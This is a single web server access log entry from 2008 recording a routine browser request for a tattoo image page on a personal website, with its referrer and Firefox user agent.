75.182.73.153 - - [28/Jun/2008:00:25:30 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
